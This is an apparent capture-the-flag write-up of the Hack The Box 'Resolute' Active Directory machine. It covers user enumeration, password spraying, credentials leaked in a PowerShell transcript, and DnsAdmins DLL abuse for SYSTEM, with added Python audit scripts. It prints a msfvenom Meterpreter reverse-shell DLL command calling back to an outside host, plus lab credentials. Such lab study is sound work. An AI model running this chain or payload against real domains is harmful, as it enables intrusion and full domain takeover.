Resolute is a medium difficulty Windows machine that features Active Directory. The Active Directory anonymous bind is used to obtain a password that the sysadmins set for new user accounts, although it seems that the password for that account has since changed. A password spray reveals that this password is still in use for another domain user account, which gives us access to the system over WinRM. A PowerShell transcript log is discovered, which has captured credentials passed on the command-line. This is used to move laterally to a user that is a member of the DnsAdmins group. This group has the ability to specify that the DNS Server service loads a plugin DLL. After restarting the DNS service, we achieve command execution on the domain controller in the context of NT_AUTHORITY\SYSTEM.
I got a username list from rpcclient and filtered it.
SMB Enumeration
I didn't get anything, as anonymous login failed.
I also tried password spraying with each username as its own password, but that failed as well.
Kerberos Enumeration
I tried an AS-REP Roasting attack, but nothing came of it; none of the users has Kerberos pre-authentication disabled.
Initial Access
When I ran out of the options I knew for getting a foothold, I decided to query the info of the users I got from rpcclient; maybe a password exists in a description field or somewhere similar.
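As an added example (not part of the original writeup), here is a small Python script that automates that check: it parses concatenated rpcclient queryuser records, such as the ones produced by the rpcclient loop shown later in this writeup, into one dict per user, then flags any Description, Comment or Full Name field that mentions a password and pulls out the likely secret token. The input is a constructed sample: the marko record mirrors the one found on the box, while the sally record and its comment text are invented.

```python
import re

# Constructed sample in the format of `rpcclient -c "queryuser <rid>"` records
# concatenated into one file. The marko record mirrors the one found on the
# box; the sally record is invented for the example.
SAMPLE_RPC_OUTPUT = """\
User Name : marko
Full Name : Marko Novak
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Account created. Password set to Welcome123!
Workstations:
Comment :
Remote Dial :
User Name : sally
Full Name : Sally Example
Home Drive :
Profile Path:
Description : Sales department
Workstations:
Comment : temp pwd: Example2024 (change on first logon)
Remote Dial :
"""

# "Key : value" lines; keys may contain spaces and the colon may be unspaced.
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z ]*?)\s*:\s*(.*)$")
# Words that usually announce a secret in a free-text field.
HINT_RE = re.compile(r"\b(?:password|passwd|pwd|pass)\b", re.I)
# The token after "password set to / is / = / :" is the likely secret itself.
CANDIDATE_RE = re.compile(
    r"\b(?:password|passwd|pwd|pass)\b\s*(?:set to|is|=|:)\s*(\S+)", re.I)


def parse_queryuser(text):
    """Split concatenated queryuser output into one dict per user record."""
    users, current = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "User Name":          # every record starts with this field
            current = {}
            users.append(current)
        if current is not None:
            current[key] = value
    return users


def find_secrets_in_fields(users, fields=("Description", "Comment", "Full Name")):
    """Flag records whose free-text fields mention a password; extract the candidate."""
    findings = []
    for user in users:
        for field in fields:
            text = user.get(field, "")
            if not HINT_RE.search(text):
                continue
            cand = CANDIDATE_RE.search(text)
            findings.append({
                "user": user.get("User Name"),
                "field": field,
                "candidate": cand.group(1) if cand else None,
                "text": text,
            })
    return findings


if __name__ == "__main__":
    for f in find_secrets_in_fields(parse_queryuser(SAMPLE_RPC_OUTPUT)):
        print(f"{f['user']:<10} {f['field']:<12} candidate={f['candidate']!r}  ({f['text']})")
```

Run it against the rpc.output file from the loop (`parse_queryuser(open("rpc.output").read())`) and every account whose description or comment carries a password hint is listed in one pass; the same script is just as useful to a domain admin auditing their own directory for this habit.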
We found the password Welcome123! in marko's description. Let's confirm access with the user marko.
It seems this password doesn't work for him, so I will spray it against the list of users we have.
So we now have valid credentials, melanie:Welcome123!. Let's see if we have remote access to that box.
Yes, we have :)
User Flag: f65ae23b0313053bb9xxxxxxxxxxxxxxxx
Privilege Escalation
When I land on a Windows box joined to Active Directory, I run bloodhound.py to collect information about the domain and feed it to the BloodHound GUI.
Start the neo4j database and then run BloodHound to open the GUI.
Provide the collected data as a zip file to BloodHound.
The user ryan has a profile on the box; let's enumerate him in BloodHound.
Click on Unrolled Group Membership to see nested group memberships.
ryan is a member of the DNSADMINS group via nested group membership, so if I could take over this account, the path to Domain Admins would be clear.
I found no database, no PowerShell history file, no stored credentials and no scripts located anywhere. However, I learned a trick that I always apply on Windows machines: look for hidden files, as I do on Linux.
PSTranscripts is not a standard directory; let's explore it.
That .txt file looks very interesting; let's see.
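Transcription logging records every parameter bound to every cmdlet, so a command that carries a password on its command line ends up in the transcript in plaintext, which is exactly what happened here. As an added example (not the author's code), the following Python script parses the ParameterBinding lines of a transcript, flags bindings that carry a credential, and produces a redacted copy of each so the report itself doesn't leak the secret. The sample transcript is constructed: it follows the format of the file found on the box, but the server, user and password values in it are placeholders, and Invoke-Sqlcmd appears only as an example of a cmdlet with a -Password parameter.

```python
import re

# One ParameterBinding line of a PowerShell transcript, for example:
#   >> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use ..."
PARAM_RE = re.compile(
    r'^>>\s*ParameterBinding\((?P<cmdlet>[^)]+)\):\s*name="(?P<name>[^"]*)";\s*value="(?P<value>.*)"\s*$'
)

# Free-text patterns for credentials inside a bound value. Group 1 is the prefix
# kept in the report, group 2 the secret-bearing remainder that gets redacted.
CREDENTIAL_PATTERNS = [
    ("net use with credentials after the share name",
     re.compile(r"(\bnet\s+use\s+\S+\s+\\\\\S+\s+)(.+)", re.I)),
    ("ConvertTo-SecureString with a literal secret",
     re.compile(r"(ConvertTo-SecureString\s+(?:-String\s+)?)(['\"]?(?!-)[^\s'\"]+['\"]?)", re.I)),
    ("password passed as a parameter value",
     re.compile(r"(-(?:Password|Pass|Pwd|p)\s+)(['\"]?(?!-)[^\s'\"]+['\"]?)", re.I)),
]

# Constructed sample transcript: placeholder host, user and password values.
SAMPLE_TRANSCRIPT = r'''**********************
Windows PowerShell transcript start
Start time: 20240101000000
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fileserver\backups svc_backup PlaceholderP@ss1"
PS>CommandInvocation(Get-ChildItem): "Get-ChildItem"
>> ParameterBinding(Get-ChildItem): name="Path"; value="C:\Users"
PS>CommandInvocation(ConvertTo-SecureString): "ConvertTo-SecureString"
>> ParameterBinding(ConvertTo-SecureString): name="String"; value="PlaceholderP@ss2"
>> ParameterBinding(ConvertTo-SecureString): name="AsPlainText"; value="True"
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="Invoke-Sqlcmd -ServerInstance db01 -Username sa -Password PlaceholderP@ss3"
'''


def scan_transcript(text):
    """Return (line_no, cmdlet, reason, redacted_value) for every credential-bearing binding."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = PARAM_RE.match(line)
        if not m:
            continue
        cmdlet, name, value = m.group("cmdlet"), m.group("name"), m.group("value")
        # Structural rule: whatever is bound to ConvertTo-SecureString -String is
        # the plaintext secret itself, no pattern matching needed.
        if cmdlet == "ConvertTo-SecureString" and name == "String":
            findings.append((line_no, cmdlet, "plaintext secret bound to -String", "<REDACTED>"))
            continue
        for reason, pattern in CREDENTIAL_PATTERNS:
            if pattern.search(value):
                redacted = pattern.sub(lambda mm: mm.group(1) + "<REDACTED>", value)
                findings.append((line_no, cmdlet, reason, redacted))
                break
    return findings


if __name__ == "__main__":
    for line_no, cmdlet, reason, redacted in scan_transcript(SAMPLE_TRANSCRIPT):
        print(f"line {line_no:>3}  {cmdlet:<24} {reason}\n           {redacted}")
```

The structural rule for ConvertTo-SecureString is the interesting part: because the transcript splits each parameter into its own binding line, the secret and the -AsPlainText switch land on different lines, so a regex over a single line would miss it, while matching on cmdlet and parameter name catches it every time.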
Let's check if these credentials are valid.
And we successfully got the ryan account.
We can then abuse our membership in the DnsAdmins group: we can make the DNS service, which runs as SYSTEM, load a DLL of ours, either to add ourselves to the Domain Admins group or to get a reverse shell as SYSTEM.
Before we start the attack, let's first confirm that we have control over the DNS service.
The object SID that has control of the DNS service is S-1-5-21-1392959593-3013219662-3596683436-1105. I looked in BloodHound to get the SID of the user ryan and see whether the two SIDs match.
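To make the "who controls the DNS service" check reproducible, here is an added Python example (not from the writeup) that decodes the sc.exe sdshow descriptor shown later in this writeup. It uses the standard two-letter service-right codes from SDDL, reports every allow ACE that grants start, stop, pause or reconfigure rights to a principal outside the default service trustees, and includes a small RID helper for matching the trailing 1105 against the object SIDs BloodHound shows. The trustee names for the SY/BA/IU/SU/SO aliases are the standard SDDL meanings; everything else comes from the descriptor itself.

```python
import re

# Two-letter access-right codes as sc.exe sdshow prints them for a service.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG",
    "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS",
    "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START",
    "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE",
    "RC": "READ_CONTROL",
    "WD": "WRITE_DAC",
    "WO": "WRITE_OWNER",
}

# Well-known trustee aliases that make up a default service DACL.
WELL_KNOWN_TRUSTEES = {
    "SY": "NT AUTHORITY\\SYSTEM",
    "BA": "BUILTIN\\Administrators",
    "IU": "Interactive logon users",
    "SU": "Service logon users",
    "SO": "BUILTIN\\Server Operators",
}

# Rights that let a principal disrupt or reconfigure the service.
CONTROL_RIGHTS = {"SERVICE_START", "SERVICE_STOP", "SERVICE_PAUSE_CONTINUE",
                  "SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER", "DELETE"}

ACE_RE = re.compile(r"\(([^)]*)\)")

# The DNS service descriptor from `sc.exe sdshow DNS` in this writeup.
RESOLUTE_DNS_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                     "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                     "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)"
                     "(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)")


def parse_service_sddl(sddl):
    """Parse the DACL part of an SDDL string into a list of ACE dicts."""
    if "D:" not in sddl:
        return []
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]   # drop owner/group and any SACL
    aces = []
    for body in ACE_RE.findall(dacl):
        parts = body.split(";")                         # type;flags;rights;guid;inherit-guid;sid
        if len(parts) < 6:
            continue
        ace_type, flags, rights, trustee = parts[0], parts[1], parts[2], parts[5]
        if rights.startswith("0x"):
            decoded = [rights]                          # raw access mask, left undecoded
        else:
            decoded = [SERVICE_RIGHTS.get(rights[i:i + 2], rights[i:i + 2])
                       for i in range(0, len(rights), 2)]
        aces.append({"type": ace_type, "flags": flags, "trustee": trustee,
                     "trustee_name": WELL_KNOWN_TRUSTEES.get(trustee, trustee),
                     "rights": decoded})
    return aces


def rid_of(sid):
    """Relative identifier (last component) of a SID, for matching directory objects."""
    return int(sid.rsplit("-", 1)[1])


def find_nondefault_controllers(aces, default_trustees=frozenset(WELL_KNOWN_TRUSTEES)):
    """Allow ACEs granting control rights to a trustee outside the default service DACL."""
    hits = []
    for ace in aces:
        if ace["type"] != "A" or ace["trustee"] in default_trustees:
            continue
        granted = sorted(CONTROL_RIGHTS.intersection(ace["rights"]))
        if granted:
            hits.append((ace["trustee"], granted))
    return hits


if __name__ == "__main__":
    aces = parse_service_sddl(RESOLUTE_DNS_SDDL)
    for ace in aces:
        print(f"{ace['trustee_name']:<50} {', '.join(ace['rights'])}")
    for sid, rights in find_nondefault_controllers(aces):
        print(f"non-default controller RID {rid_of(sid)} ({sid}): {', '.join(rights)}")
```

On the descriptor from the box the only non-default principal is RID 1105, and it holds SERVICE_START, SERVICE_STOP and SERVICE_PAUSE_CONTINUE but not SERVICE_CHANGE_CONFIG, which matches what the rest of the writeup relies on: that principal can bounce the service, and the plugin path is set elsewhere. Running the same audit over every service on a domain controller is a cheap way to spot which groups can restart sensitive services.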
So, we have control of the DNS service. Let's start the attack.
Generate a malicious DLL to add ryan to Domain Admins.
Upload the malicious DLL to the box via WinRM.
Load our DLL.
Start a Meterpreter listener.
Stop and start the DNS service to get the DLL executed.
My exploit failed for some reason, but after a few moments I realized that there was a script that reverts everything and deletes my payload, so I created a one-liner command to get my payload executed before it was deleted.
Root Flag: 2ef8121d16eb0fabebxxxxxxxxxxxxxxxx
Reverst.ps1
This is the script that was getting in our way, as it does the following:
Resets the passwords of ryan, melanie and Administrator
Resets the DNS settings
We can see the plaintext password of Administrator.
Access the machine as Administrator with the plaintext password.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ impacket-GetNPUsers megabank.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
<snip>
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ for rid in $(cat rid.lst); do rpcclient -U "%" $ip -c "queryuser $rid" | tee -a rpc.output;done
<snip>
User Name : marko
Full Name : Marko Novak
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Account created. Password set to Welcome123!
Workstations:
Comment :
Remote Dial :
<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ bloodhound-python -u 'melanie' -p 'Welcome123!' -ns $ip -d megabank.local -c all
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: Resolute.megabank.local
INFO: Found 28 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: MS02.megabank.local
INFO: Querying computer: Resolute.megabank.local
INFO: Done in 00M 20S
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:43 AM Administrator
d----- 12/4/2019 2:46 AM melanie
d-r--- 11/20/2016 6:39 PM Public
d----- 9/27/2019 7:05 AM ryan
*Evil-WinRM* PS C:\> ls -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 7/10/2024 7:18 PM 402653184 pagefile.sys
*Evil-WinRM* PS C:\> ls -Force C:\PSTranscripts\
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
*Evil-WinRM* PS C:\> ls -Force C:\PSTranscripts\20191203
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
*Evil-WinRM* PS C:\> type C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
<snip>
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
<snip>
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe sdshow DNS
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.3 lport=8443 -f dll -o shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 311 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8443
[*] Sending stage (201798 bytes) to 10.10.10.169
[*] Meterpreter session 2 opened (10.10.16.3:8443 -> 10.10.10.169:53631) at 2024-07-10 23:40:39 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2592 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\Administrator
C:\Users\Administrator>type Desktop\root.txt
2ef8121d16eb0fabebxxxxxxxxxxxxxxxx